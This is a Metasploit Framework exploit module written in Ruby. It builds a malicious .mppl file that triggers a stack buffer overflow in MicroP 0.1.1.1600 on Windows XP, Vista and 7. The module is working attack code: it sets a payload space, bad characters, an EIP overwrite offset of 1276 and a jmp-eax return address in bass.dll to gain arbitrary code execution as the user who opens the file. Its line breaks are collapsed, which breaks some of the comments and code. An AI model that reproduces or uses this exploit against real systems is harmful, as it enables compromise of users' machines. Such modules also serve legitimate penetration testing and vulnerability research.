### $Id: microp_mppl.rb 13114 2011-07-07 06:29:37Z sinn3r $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,'Name' => 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow','Description'=> %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600.A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA()function, and results
arbitrary code execution under the context of the user.},'License'=> MSF_LICENSE,'Author' => ['James Fitts'],'Version'=> '$Revision: 13114 $','References' =>
[['URL','http://www.exploit-db.com/exploits/14720'],],'DefaultOptions' =>
{'EXITFUNC' => 'process','DisablePayloadHandler' => 'true',},'Payload'=>
{'Space'=> 728,'BadChars' => "\x00\x0a\x0d",},'Platform' => 'win','Targets'=>
[['Windows XP SP3 / Vista / 7',{'Ret'=> 0x100145b5,#jmp eax in bass.dll'Offset' => 1276,#Offset to overwrite EIP}],],'Privileged' => false,'DisclosureDate' => 'Aug 23 2010','DefaultTarget'=> 0))
register_options([
OptString.new('FILENAME',[ true,'The file name.','msf.mppl']),], self.class)end
def exploit
mppl= payload.encoded
mppl << rand_text_alpha(target['Offset']- payload.encoded.length)
mppl << [target.ret].pack('V')
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(mppl)endend
